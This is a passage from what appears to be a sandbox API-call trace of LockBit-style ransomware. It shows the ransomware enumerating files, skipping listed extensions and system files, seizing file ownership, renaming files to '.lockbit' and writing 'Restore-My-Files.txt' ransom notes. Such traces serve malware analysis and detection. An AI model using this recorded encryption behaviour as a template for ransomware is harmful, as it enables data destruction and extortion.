[0082.357] NtSetInformationFile (FileHandle=0x3b8, IoStatusBlock=0x3d6aa8c, FileInformation=0x77d800, Length=0xb0, FileInformationClass=0xa) returned 0x0 [0082.357] free (_Block=0x77d800) [0082.357] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\OldAge\\1047x576black.png" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\OldAge") returned 1 [0082.357] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\OldAge\\Restore-My-Files.txt") returned 72 [0082.357] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\OldAge\\Restore-My-Files.txt" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\oldage\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3b4 [0082.358] CreateIoCompletionPort (FileHandle=0x3b4, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0082.358] malloc (_Size=0x40068) returned 0x1ff1e60 [0082.358] WriteFile (in: hFile=0x3b4, lpBuffer=0x1fa30f8, nNumberOfBytesToWrite=0x472, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1fa30f8, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 0x0 [0082.362] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6fce7e01, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6fce7e01, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4d2ed141, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xb05, dwReserved0=0x0, dwReserved1=0x0, cFileName="15x15dot.png", cAlternateFileName="")) returned 1 [0082.362] lstrcmpiW (lpString1=".", lpString2="15x15dot.png") returned -1 [0082.362] lstrcmpiW (lpString1="..", lpString2="15x15dot.png") returned -1 [0082.362] PathFindExtensionW (pszPath="15x15dot.png") returned=".png" [0082.362] lstrcmpiW (lpString1=".386", lpString2=".png") returned -1 [0082.362] lstrcmpiW (lpString1=".cmd", lpString2=".png") returned -1 [0082.362] lstrcmpiW (lpString1=".exe", lpString2=".png") returned -1 [0082.363] lstrcmpiW (lpString1=".ani", lpString2=".png") returned -1 [0082.363] lstrcmpiW (lpString1=".adv", lpString2=".png") returned -1 [0082.363] lstrcmpiW (lpString1=".theme", lpString2=".png") returned 1 [0082.363] lstrcmpiW (lpString1=".msi", lpString2=".png") returned -1 [0082.363] lstrcmpiW (lpString1=".msp", lpString2=".png") returned -1 [0082.363] lstrcmpiW (lpString1=".com", lpString2=".png") returned -1 [0082.363] lstrcmpiW (lpString1=".diagpkg", lpString2=".png") returned -1 [0082.363] lstrcmpiW (lpString1=".nls", lpString2=".png") returned -1 [0082.363] lstrcmpiW (lpString1=".diagcab", lpString2=".png") returned -1 [0082.363] lstrcmpiW (lpString1=".lock", lpString2=".png") returned -1 [0082.363] lstrcmpiW (lpString1=".ocx", lpString2=".png") returned -1 [0082.363] lstrcmpiW (lpString1=".mpa", lpString2=".png") returned -1 [0082.363] lstrcmpiW (lpString1=".cpl", lpString2=".png") returned -1 [0082.363] lstrcmpiW (lpString1=".mod", lpString2=".png") returned -1 [0082.363] lstrcmpiW (lpString1=".hta", lpString2=".png") returned -1 [0082.363] lstrcmpiW (lpString1=".icns", lpString2=".png") returned -1 [0082.363] lstrcmpiW (lpString1=".prf", lpString2=".png") returned 1 [0082.363] lstrcmpiW (lpString1=".rtp", lpString2=".png") returned 1 [0082.363] lstrcmpiW (lpString1=".diagcfg", lpString2=".png") returned -1 [0082.364] lstrcmpiW (lpString1=".msstyles", lpString2=".png") returned -1 [0082.364] lstrcmpiW (lpString1=".bin", lpString2=".png") returned -1 [0082.364] lstrcmpiW (lpString1=".hlp", lpString2=".png") returned -1 [0082.364] lstrcmpiW (lpString1=".shs", lpString2=".png") returned 1 [0082.364] lstrcmpiW (lpString1=".drv", lpString2=".png") returned -1 [0082.364] lstrcmpiW (lpString1=".wpx", lpString2=".png") returned 1 [0082.364] lstrcmpiW (lpString1=".bat", lpString2=".png") returned -1 [0082.364] lstrcmpiW (lpString1=".rom", lpString2=".png") returned 1 [0082.364] lstrcmpiW (lpString1=".msc", lpString2=".png") returned -1 [0082.364] lstrcmpiW (lpString1=".spl", lpString2=".png") returned 1 [0082.364] lstrcmpiW (lpString1=".ps1", lpString2=".png") returned 1 [0082.364] lstrcmpiW (lpString1=".msu", lpString2=".png") returned -1 [0082.364] lstrcmpiW (lpString1=".ics", lpString2=".png") returned -1 [0082.364] lstrcmpiW (lpString1=".key", lpString2=".png") returned -1 [0082.364] lstrcmpiW (lpString1=".mp3", lpString2=".png") returned -1 [0082.364] lstrcmpiW (lpString1=".reg", lpString2=".png") returned 1 [0082.364] lstrcmpiW (lpString1=".dll", lpString2=".png") returned -1 [0082.364] lstrcmpiW (lpString1=".ini", lpString2=".png") returned -1 [0082.364] lstrcmpiW (lpString1=".idx", lpString2=".png") returned -1 [0082.364] lstrcmpiW (lpString1=".sys", lpString2=".png") returned 1 [0082.365] lstrcmpiW (lpString1=".hlp", lpString2=".png") returned -1 [0082.365] lstrcmpiW (lpString1=".ico", lpString2=".png") returned -1 [0082.365] lstrcmpiW (lpString1=".lnk", lpString2=".png") returned -1 [0082.365] lstrcmpiW (lpString1=".rdp", lpString2=".png") returned 1 [0082.365] lstrcmpiW (lpString1=".lockbit", lpString2=".png") returned -1 [0082.365] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="15x15dot.png") returned 1 [0082.365] lstrcmpiW (lpString1="ntldr", lpString2="15x15dot.png") returned 1 [0082.365] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="15x15dot.png") returned 1 [0082.365] lstrcmpiW (lpString1="bootsect.bak", lpString2="15x15dot.png") returned 1 [0082.365] lstrcmpiW (lpString1="autorun.inf", lpString2="15x15dot.png") returned 1 [0082.365] lstrcmpiW (lpString1="thumbs.db", lpString2="15x15dot.png") returned 1 [0082.365] lstrcmpiW (lpString1="iconcache.db", lpString2="15x15dot.png") returned 1 [0082.365] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\OldAge" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\OldAge\\") returned="" [0082.365] PathFindExtensionW (pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\OldAge\\15x15dot.png") returned=".png" [0082.365] lstrcmpiW (lpString1=".rar", lpString2=".png") returned 1 [0082.365] lstrcmpiW (lpString1=".zip", lpString2=".png") returned 1 [0082.365] lstrcmpiW (lpString1=".7z", lpString2=".png") returned -1 [0082.365] lstrcmpiW (lpString1=".ckp", lpString2=".png") returned -1 [0082.365] lstrcmpiW (lpString1=".dacpac", lpString2=".png") returned -1 [0082.366] lstrcmpiW (lpString1=".db", lpString2=".png") returned -1 [0082.366] lstrcmpiW (lpString1=".db-shm", lpString2=".png") returned -1 [0082.366] lstrcmpiW (lpString1=".db-wal", lpString2=".png") returned -1 [0082.366] lstrcmpiW (lpString1=".db3", lpString2=".png") returned -1 [0082.366] lstrcmpiW (lpString1=".dbf", lpString2=".png") returned -1 [0082.366] lstrcmpiW (lpString1=".dbc", lpString2=".png") returned -1 [0082.366] lstrcmpiW (lpString1=".dbs", lpString2=".png") returned -1 [0082.366] lstrcmpiW (lpString1=".dbt", lpString2=".png") returned -1 [0082.366] lstrcmpiW (lpString1=".dbv", lpString2=".png") returned -1 [0082.366] lstrcmpiW (lpString1=".frm", lpString2=".png") returned -1 [0082.366] lstrcmpiW (lpString1=".mdf", lpString2=".png") returned -1 [0082.366] lstrcmpiW (lpString1=".mrg", lpString2=".png") returned -1 [0082.366] lstrcmpiW (lpString1=".mwb", lpString2=".png") returned -1 [0082.366] lstrcmpiW (lpString1=".myd", lpString2=".png") returned -1 [0082.366] lstrcmpiW (lpString1=".ndf", lpString2=".png") returned -1 [0082.366] lstrcmpiW (lpString1=".qry", lpString2=".png") returned 1 [0082.366] lstrcmpiW (lpString1=".sdb", lpString2=".png") returned 1 [0082.366] lstrcmpiW (lpString1=".sdf", lpString2=".png") returned 1 [0082.366] lstrcmpiW (lpString1=".sql", lpString2=".png") returned 1 [0082.366] lstrcmpiW (lpString1=".sqlite", lpString2=".png") returned 1 [0082.367] lstrcmpiW (lpString1=".sqlite3", lpString2=".png") returned 1 [0082.367] lstrcmpiW (lpString1=".sqlitedb", lpString2=".png") returned 1 [0082.367] lstrcmpiW (lpString1=".tmd", lpString2=".png") returned 1 [0082.367] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\OldAge\\15x15dot.png.lockbit") returned 72 [0082.367] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\OldAge\\15x15dot.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\oldage\\15x15dot.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0082.367] GetProcAddress (hModule=0x77c40000, lpProcName="RtlFreeUnicodeString") returned 0x77c6e126 [0082.368] GetProcAddress (hModule=0x77c40000, lpProcName="RtlDosPathNameToNtPathName_U_WithStatus") returned 0x77c81660 [0082.368] RtlDosPathNameToNtPathName_U_WithStatus () returned 0x0 [0082.368] GetProcAddress (hModule=0x77c40000, lpProcName="NtOpenFile") returned 0x77c5fd54 [0082.368] GetProcAddress (hModule=0x77c40000, lpProcName="CloseHandle") returned 0x0 [0082.368] RtlFreeAnsiString (AnsiString="\\") [0082.368] NtOpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x3d6ace0 | out: TokenHandle=0x3d6ace0*=0x3c0) returned 0x0 [0082.368] malloc (_Size=0x200) returned 0x77d800 [0082.368] NtQueryInformationToken (in: TokenHandle=0x3c0, TokenInformationClass=0x1, TokenInformation=0x77d800, TokenInformationLength=0x200, ReturnLength=0x3d6acd8 | out: TokenInformation=0x77d800, ReturnLength=0x3d6acd8) returned 0x0 [0082.369] InitializeSecurityDescriptor (in: pSecurityDescriptor=0x3d6aa94, dwRevision=0x1 | out: pSecurityDescriptor=0x3d6aa94) returned 1 [0082.369] SetSecurityDescriptorOwner (in: pSecurityDescriptor=0x3d6aa94, pOwner=0x77d808*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), bOwnerDefaulted=0 | out: pSecurityDescriptor=0x3d6aa94) returned 1 [0082.369] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\OldAge\\15x15dot.png", SecurityInformation=0x1, pSecurityDescriptor=0x3d6aa94) returned 1 [0082.369] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\OldAge\\15x15dot.png", SecurityInformation=0x4, pSecurityDescriptor=0x3d6aa94) returned 1 [0082.369] CloseHandle (hObject=0x3c0) returned 1 [0082.370] free (_Block=0x77d800) [0082.370] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\OldAge\\15x15dot.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\oldage\\15x15dot.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3c0 [0082.370] CreateIoCompletionPort (FileHandle=0x3c0, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0082.370] malloc (_Size=0x40068) returned 0x3db00b8 [0082.371] GetFileSizeEx (in: hFile=0x3c0, lpFileSize=0x3db00d0 | out: lpFileSize=0x3db00d0*=2821) returned 1 [0082.371] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0082.372] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0082.372] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3df00ec, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3df00ec) returned 0x0 [0082.372] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0082.372] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0082.372] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3df00fc, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3df00fc) returned 0x0 [0082.372] ReadFile (in: hFile=0x3c0, lpBuffer=0x3db00ec, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3db00b8 | out: lpBuffer=0x3db00ec*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3db00b8) returned 1 [0082.378] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\OldAge\\15x15dot.png.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\OldAge\\15x15dot.png.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0082.378] malloc (_Size=0xa6) returned 0x77d800 [0082.378] NtSetInformationFile (FileHandle=0x3c0, IoStatusBlock=0x3d6aa8c, FileInformation=0x77d800, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0082.379] free (_Block=0x77d800) [0082.379] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\OldAge\\15x15dot.png" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\OldAge") returned 1 [0082.379] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\OldAge\\Restore-My-Files.txt") returned 72 [0082.379] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\OldAge\\Restore-My-Files.txt" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\oldage\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0082.379] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6fd0df5e, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6fd0df5e, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4d2ed141, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x183b, dwReserved0=0x0, dwReserved1=0x0, cFileName="decorative_rule.png", cAlternateFileName="")) returned 1 [0082.379] lstrcmpiW (lpString1=".", lpString2="decorative_rule.png") returned -1 [0082.379] lstrcmpiW (lpString1="..", lpString2="decorative_rule.png") returned -1 [0082.379] PathFindExtensionW (pszPath="decorative_rule.png") returned=".png" [0082.379] lstrcmpiW (lpString1=".386", lpString2=".png") returned -1 [0082.379] lstrcmpiW (lpString1=".cmd", lpString2=".png") returned -1 [0082.379] lstrcmpiW (lpString1=".exe", lpString2=".png") returned -1 [0082.379] lstrcmpiW (lpString1=".ani", lpString2=".png") returned -1 [0082.379] lstrcmpiW (lpString1=".adv", lpString2=".png") returned -1 [0082.379] lstrcmpiW (lpString1=".theme", lpString2=".png") returned 1 [0082.379] lstrcmpiW (lpString1=".msi", lpString2=".png") returned -1 [0082.380] lstrcmpiW (lpString1=".msp", lpString2=".png") returned -1 [0082.380] lstrcmpiW (lpString1=".com", lpString2=".png") returned -1 [0082.380] lstrcmpiW (lpString1=".diagpkg", lpString2=".png") returned -1 [0082.380] lstrcmpiW (lpString1=".nls", lpString2=".png") returned -1 [0082.380] lstrcmpiW (lpString1=".diagcab", lpString2=".png") returned -1 [0082.380] lstrcmpiW (lpString1=".lock", lpString2=".png") returned -1 [0082.380] lstrcmpiW (lpString1=".ocx", lpString2=".png") returned -1 [0082.380] lstrcmpiW (lpString1=".mpa", lpString2=".png") returned -1 [0082.380] lstrcmpiW (lpString1=".cpl", lpString2=".png") returned -1 [0082.380] lstrcmpiW (lpString1=".mod", lpString2=".png") returned -1 [0082.380] lstrcmpiW (lpString1=".hta", lpString2=".png") returned -1 [0082.380] lstrcmpiW (lpString1=".icns", lpString2=".png") returned -1 [0082.380] lstrcmpiW (lpString1=".prf", lpString2=".png") returned 1 [0082.380] lstrcmpiW (lpString1=".rtp", lpString2=".png") returned 1 [0082.380] lstrcmpiW (lpString1=".diagcfg", lpString2=".png") returned -1 [0082.380] lstrcmpiW (lpString1=".msstyles", lpString2=".png") returned -1 [0082.380] lstrcmpiW (lpString1=".bin", lpString2=".png") returned -1 [0082.380] lstrcmpiW (lpString1=".hlp", lpString2=".png") returned -1 [0082.380] lstrcmpiW (lpString1=".shs", lpString2=".png") returned 1 [0082.381] lstrcmpiW (lpString1=".drv", lpString2=".png") returned -1 [0082.381] lstrcmpiW (lpString1=".wpx", lpString2=".png") returned 1 [0082.381] lstrcmpiW (lpString1=".bat", lpString2=".png") returned -1 [0082.381] lstrcmpiW (lpString1=".rom", lpString2=".png") returned 1 [0082.381] lstrcmpiW (lpString1=".msc", lpString2=".png") returned -1 [0082.381] lstrcmpiW (lpString1=".spl", lpString2=".png") returned 1 [0082.381] lstrcmpiW (lpString1=".ps1", lpString2=".png") returned 1 [0082.381] lstrcmpiW (lpString1=".msu", lpString2=".png") returned -1 [0082.381] lstrcmpiW (lpString1=".ics", lpString2=".png") returned -1 [0082.381] lstrcmpiW (lpString1=".key", lpString2=".png") returned -1 [0082.381] lstrcmpiW (lpString1=".mp3", lpString2=".png") returned -1 [0082.381] lstrcmpiW (lpString1=".reg", lpString2=".png") returned 1 [0082.381] lstrcmpiW (lpString1=".dll", lpString2=".png") returned -1 [0082.381] lstrcmpiW (lpString1=".ini", lpString2=".png") returned -1 [0082.381] lstrcmpiW (lpString1=".idx", lpString2=".png") returned -1 [0082.381] lstrcmpiW (lpString1=".sys", lpString2=".png") returned 1 [0082.381] lstrcmpiW (lpString1=".hlp", lpString2=".png") returned -1 [0082.381] lstrcmpiW (lpString1=".ico", lpString2=".png") returned -1 [0082.381] lstrcmpiW (lpString1=".lnk", lpString2=".png") returned -1 [0082.382] lstrcmpiW (lpString1=".rdp", lpString2=".png") returned 1 [0082.382] lstrcmpiW (lpString1=".lockbit", lpString2=".png") returned -1 [0082.382] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="decorative_rule.png") returned 1 [0082.382] lstrcmpiW (lpString1="ntldr", lpString2="decorative_rule.png") returned 1 [0082.382] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="decorative_rule.png") returned 1 [0082.382] lstrcmpiW (lpString1="bootsect.bak", lpString2="decorative_rule.png") returned -1 [0082.382] lstrcmpiW (lpString1="autorun.inf", lpString2="decorative_rule.png") returned -1 [0082.382] lstrcmpiW (lpString1="thumbs.db", lpString2="decorative_rule.png") returned 1 [0082.382] lstrcmpiW (lpString1="iconcache.db", lpString2="decorative_rule.png") returned 1 [0082.382] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\OldAge" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\OldAge\\") returned="" [0082.382] PathFindExtensionW (pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\OldAge\\decorative_rule.png") returned=".png" [0082.382] lstrcmpiW (lpString1=".rar", lpString2=".png") returned 1 [0082.382] lstrcmpiW (lpString1=".zip", lpString2=".png") returned 1 [0082.382] lstrcmpiW (lpString1=".7z", lpString2=".png") returned -1 [0082.382] lstrcmpiW (lpString1=".ckp", lpString2=".png") returned -1 [0082.382] lstrcmpiW (lpString1=".dacpac", lpString2=".png") returned -1 [0082.382] lstrcmpiW (lpString1=".db", lpString2=".png") returned -1 [0082.382] lstrcmpiW (lpString1=".db-shm", lpString2=".png") returned -1 [0082.383] lstrcmpiW (lpString1=".db-wal", lpString2=".png") returned -1 [0082.383] lstrcmpiW (lpString1=".db3", lpString2=".png") returned -1 [0082.383] lstrcmpiW (lpString1=".dbf", lpString2=".png") returned -1 [0082.383] lstrcmpiW (lpString1=".dbc", lpString2=".png") returned -1 [0082.383] lstrcmpiW (lpString1=".dbs", lpString2=".png") returned -1 [0082.383] lstrcmpiW (lpString1=".dbt", lpString2=".png") returned -1 [0082.383] lstrcmpiW (lpString1=".dbv", lpString2=".png") returned -1 [0082.383] lstrcmpiW (lpString1=".frm", lpString2=".png") returned -1 [0082.383] lstrcmpiW (lpString1=".mdf", lpString2=".png") returned -1 [0082.383] lstrcmpiW (lpString1=".mrg", lpString2=".png") returned -1 [0082.383] lstrcmpiW (lpString1=".mwb", lpString2=".png") returned -1 [0082.383] lstrcmpiW (lpString1=".myd", lpString2=".png") returned -1 [0082.383] lstrcmpiW (lpString1=".ndf", lpString2=".png") returned -1 [0082.383] lstrcmpiW (lpString1=".qry", lpString2=".png") returned 1 [0082.383] lstrcmpiW (lpString1=".sdb", lpString2=".png") returned 1 [0082.383] lstrcmpiW (lpString1=".sdf", lpString2=".png") returned 1 [0082.383] lstrcmpiW (lpString1=".sql", lpString2=".png") returned 1 [0082.383] lstrcmpiW (lpString1=".sqlite", lpString2=".png") returned 1 [0082.383] lstrcmpiW (lpString1=".sqlite3", lpString2=".png") returned 1 [0082.384] lstrcmpiW (lpString1=".sqlitedb", lpString2=".png") returned 1 [0082.384] lstrcmpiW (lpString1=".tmd", lpString2=".png") returned 1 [0082.384] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\OldAge\\decorative_rule.png.lockbit") returned 79 [0082.384] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\OldAge\\decorative_rule.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\oldage\\decorative_rule.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0082.393] GetProcAddress (hModule=0x77c40000, lpProcName="RtlFreeUnicodeString") returned 0x77c6e126 [0082.393] GetProcAddress (hModule=0x77c40000, lpProcName="RtlDosPathNameToNtPathName_U_WithStatus") returned 0x77c81660 [0082.393] RtlDosPathNameToNtPathName_U_WithStatus () returned 0x0 [0082.393] GetProcAddress (hModule=0x77c40000, lpProcName="NtOpenFile") returned 0x77c5fd54 [0082.394] GetProcAddress (hModule=0x77c40000, lpProcName="CloseHandle") returned 0x0 [0082.394] RtlFreeAnsiString (AnsiString="\\") [0082.394] NtOpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x3d6ace0 | out: TokenHandle=0x3d6ace0*=0x3c4) returned 0x0 [0082.394] malloc (_Size=0x200) returned 0x77d800 [0082.394] NtQueryInformationToken (in: TokenHandle=0x3c4, TokenInformationClass=0x1, TokenInformation=0x77d800, TokenInformationLength=0x200, ReturnLength=0x3d6acd8 | out: TokenInformation=0x77d800, ReturnLength=0x3d6acd8) returned 0x0 [0082.394] InitializeSecurityDescriptor (in: pSecurityDescriptor=0x3d6aa94, dwRevision=0x1 | out: pSecurityDescriptor=0x3d6aa94) returned 1 [0082.394] SetSecurityDescriptorOwner (in: pSecurityDescriptor=0x3d6aa94, pOwner=0x77d808*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), bOwnerDefaulted=0 | out: pSecurityDescriptor=0x3d6aa94) returned 1 [0082.394] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\OldAge\\decorative_rule.png", SecurityInformation=0x1, pSecurityDescriptor=0x3d6aa94) returned 1 [0082.395] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\OldAge\\decorative_rule.png", SecurityInformation=0x4, pSecurityDescriptor=0x3d6aa94) returned 1 [0082.395] CloseHandle (hObject=0x3c4) returned 1 [0082.395] free (_Block=0x77d800) [0082.395] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\OldAge\\decorative_rule.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\oldage\\decorative_rule.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3c4 [0082.395] CreateIoCompletionPort (FileHandle=0x3c4, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0082.395] malloc (_Size=0x40068) returned 0x3d70048 [0082.396] GetFileSizeEx (in: hFile=0x3c4, lpFileSize=0x3d70060 | out: lpFileSize=0x3d70060*=6203) returned 1 [0082.396] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0082.396] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0082.396] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db007c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db007c) returned 0x0 [0082.396] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0082.397] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0082.397] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db008c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db008c) returned 0x0 [0082.397] ReadFile (in: hFile=0x3c4, lpBuffer=0x3d7007c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70048 | out: lpBuffer=0x3d7007c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70048) returned 1 [0082.399] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\OldAge\\decorative_rule.png.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\OldAge\\decorative_rule.png.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0082.399] malloc (_Size=0xb4) returned 0x77d800 [0082.399] NtSetInformationFile (FileHandle=0x3c4, IoStatusBlock=0x3d6aa8c, FileInformation=0x77d800, Length=0xb4, FileInformationClass=0xa) returned 0x0 [0082.400] free (_Block=0x77d800) [0082.400] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\OldAge\\decorative_rule.png" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\OldAge") returned 1 [0082.400] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\OldAge\\Restore-My-Files.txt") returned 72 [0082.400] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\OldAge\\Restore-My-Files.txt" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\oldage\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0082.400] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6fdcc62f, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6fdcc62f, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4d2ed141, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x13e0, dwReserved0=0x0, dwReserved1=0x0, cFileName="NavigationLeft_ButtonGraphic.png", cAlternateFileName="")) returned 1 [0082.400] lstrcmpiW (lpString1=".", lpString2="NavigationLeft_ButtonGraphic.png") returned -1 [0082.400] 